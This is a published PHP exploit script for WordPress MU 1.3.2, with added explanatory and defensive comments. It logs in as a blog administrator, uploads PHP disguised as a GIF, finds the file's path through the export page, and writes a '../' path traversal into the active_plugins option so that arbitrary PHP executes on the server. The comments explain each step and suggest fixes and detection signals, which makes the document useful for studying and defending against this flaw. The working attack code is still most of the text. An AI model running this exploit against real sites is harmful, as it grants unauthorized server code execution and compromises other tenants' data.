Wordpress MU 1.3.2 active_plugins option Code Execution Exploit

  1    <?php
  2    /*
  3    WordPress [MU] blog’s options overwrite
  4
  5    Credits : Alexander Concha <alex at buayacorp dot com>
  6    Website : http://www.buayacorp.com/
  7    Advisory: http://www.buayacorp.com/files/wordpress/wordpress−mu−options−overwrite.html
  8
  9    This exploit uses active_plugins option to execute arbitrary PHP
  10   */
  11   include_once ’./class−snoopy.php’;
  12
  13   // Fix Snoopy
       // Snoopy's _prepare_post_body() normally builds the request body from a form-variable
       // array. This subclass short-circuits that when the caller passes an already-built
       // string, so the string is sent verbatim as the POST body. Below this is used to POST a
       // file's raw contents with a caller-chosen Content-Type (see the _submit_type assignment).
  14   class SnoopyExt extends Snoopy {
  15           function _prepare_post_body($formvars, $formfiles) {
                       // A string body is passed through untouched; nothing is encoded.
  16                   if ( is_string($formvars) ) {
  17                           return $formvars;
  18                   }
                       // Anything else keeps Snoopy's original encoding behaviour.
  19                   return parent::_prepare_post_body($formvars, $formfiles);
  20           }
  21   }
  22
  23   set_time_limit( 0 );
  24
  25   // Any user with ’manage_options’ and ’upload_files’ capabilities
       // The privilege boundary being crossed: these are ordinary blog-level capabilities, not
       // server or filesystem access. On a multi-user (MU) install an individual blog's
       // administrator would typically hold both, so a successful run turns per-blog admin rights
       // into server-side PHP execution — the tenant boundary MU is meant to enforce.
  26   $user = ’user’;
  27   $pass = ’1234’;
  28   $blog_url = ’http://localhost.localdomain/mu/’;
  29   $remote_file = ’’; // relative path to wp−content
  30   $local_file = ’’; // the contents of this file, if any, will be uploaded
  31
  32   $snoopy = new SnoopyExt();
  33
       // Redirects are not followed; each response is inspected as returned.
  34   $snoopy−>maxredirs = 0;
       // wp-login.php checks for this test cookie to confirm the client accepts cookies;
       // pre-setting it lets the login POST succeed without a preceding GET.
  35   $snoopy−>cookies[’wordpress_test_cookie’] = ’WP+Cookie+check’;
  36   $snoopy−>submit("{$blog_url}wp−login.php", array(’log’ => $user, ’pwd’ => $pass));
  37
  38   $snoopy−>setcookies(); // Set auth cookies for future requests
  39
  40   if ( empty($remote_file) ) {
  41           // Upload a new file
               // Step 1 (upload): the body comes from get_contents() — PHP source by default — but
               // is declared to the AtomPub endpoint as image/gif. Defensive note: a declared image
               // type whose bytes begin with a PHP open tag is a strong detection signal, and the
               // uploads directory should not have PHP execution enabled in the first place.
  42           $snoopy−>_submit_type = ’image/gif’;
  43           $snoopy−>submit("{$blog_url}wp−app.php?action=/attachments", get_contents());
  44
               // The AtomPub response carries the new attachment's <id>; only its basename is kept.
  45            if ( preg_match(’#<id>([^<]+)</id>#i’, $snoopy−>results, $match) ) {
  46                    $remote_file = basename($match[1]);
  47            }
  48   }
  49   if ( empty($remote_file) ) die(’Exploit failed...’);
  50
  51   // Look for real path
       // Step 2 (path disclosure): the WXR export includes attachment metadata, which reveals
       // where the upload was stored relative to wp-content. Precise knowledge of storage layout
       // is what makes the path traversal in the next step possible; exports should not expose
       // more of the filesystem than the requesting role needs.
  52   $snoopy−>fetch("{$blog_url}wp−admin/export.php?download");
  53
       // Step 2 continued: extract the stored path of the upload from the export and drop
       // everything up to and including "wp-content", leaving a path relative to it.
  54   if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy−>results, $match) ) {
  55           $remote_file = preg_replace(’#.*?wp−content#’, ’’, $match[1]);
  56   }
  57   if ( empty($remote_file) ) die(’Exploit failed...’);
  58
  59   // It assumes that file uploads are stored within wp−content
       // Step 3 (traversal): active_plugins entries are loaded relative to the plugins
       // directory, so a leading '../' walks back to wp-content and points at the uploaded file.
       // The missing server-side control is validation that every active plugin path stays inside
       // the plugins directory; later WordPress releases validate the active_plugins list for
       // exactly this reason.
  60   $remote_file = ’../’ . ltrim($remote_file, ’/’);
  61
  62   $snoopy−>fetch("{$blog_url}wp−admin/plugins.php");
  63
  64   // Recover previous active plugins
       // The currently active plugins are scraped from the deactivate links and re-submitted
       // unchanged, so the site keeps working; the only addition is the uploaded file.
  65   $active_plugins = array();
  66   if ( preg_match_all(’#action=deactivate&([^\’]+)#’, $snoopy−>results, $matches) ) {
  67             foreach ($matches[0] as $plugin) {
  68                     if ( preg_match(’#plugin=([^&]+)#’, $plugin, $match) )
  69                               $active_plugins[] = urldecode($match[1]);
  70             }
                 // Debug output of the recovered list.
  71             print_r($active_plugins);
  72   }
  73   $active_plugins[] = $remote_file;
  74
  75   // Fetch a valid nonce
       // The nonce is a CSRF token, not an authorization check: an authenticated user can read
       // a valid one from any admin page they are allowed to view, so it does not stop this.
  76   $snoopy−>fetch("{$blog_url}wp−admin/options−general.php");
  77
  78   if ( preg_match(’#name=._wpnonce. value=.([a−z\d]{10}).#’, $snoopy−>results, $match) ) {
  79
  80            // Finally update active_plugins
                // Step 4 (sink): options.php's generic update handler appears to write whichever
                // options the client names in 'page_options'. Letting the client pick the option
                // is the "options overwrite" weakness from the header; the fix is a server-side
                // allowlist of the options each settings page may update, plus validation of the
                // active_plugins value itself. Detection: an options.php POST that sets
                // active_plugins via the general-settings nonce, or active_plugins entries
                // containing '../' or resolving outside the plugins directory.
  81            $snoopy−>set_submit_normal();
  82            $snoopy−>submit("{$blog_url}wp−admin/options.php",
  83                    array(
  84                            ’active_plugins’ => $active_plugins,
  85                            ’_wpnonce’ => $match[1],
  86                            ’action’ => ’update’,
  87                            ’page_options’ => ’active_plugins’,
  88                    ));
  89   }
  90
  91   function get_contents() {
               // Returns the bytes to upload: the contents of $local_file when that path exists on
               // the machine running this script, otherwise a minimal PHP probe that prints its own
               // path. Note the file_exists() check is local, not a check on the remote server.
  92           global $local_file;
  93
  94            return file_exists($local_file) ? file_get_contents($local_file) : ’<?php echo "Hello World " . __FILE__; ?>’;
  95   }
  96   ?>
  97
  98   # milw0rm.com [2008−02−05]



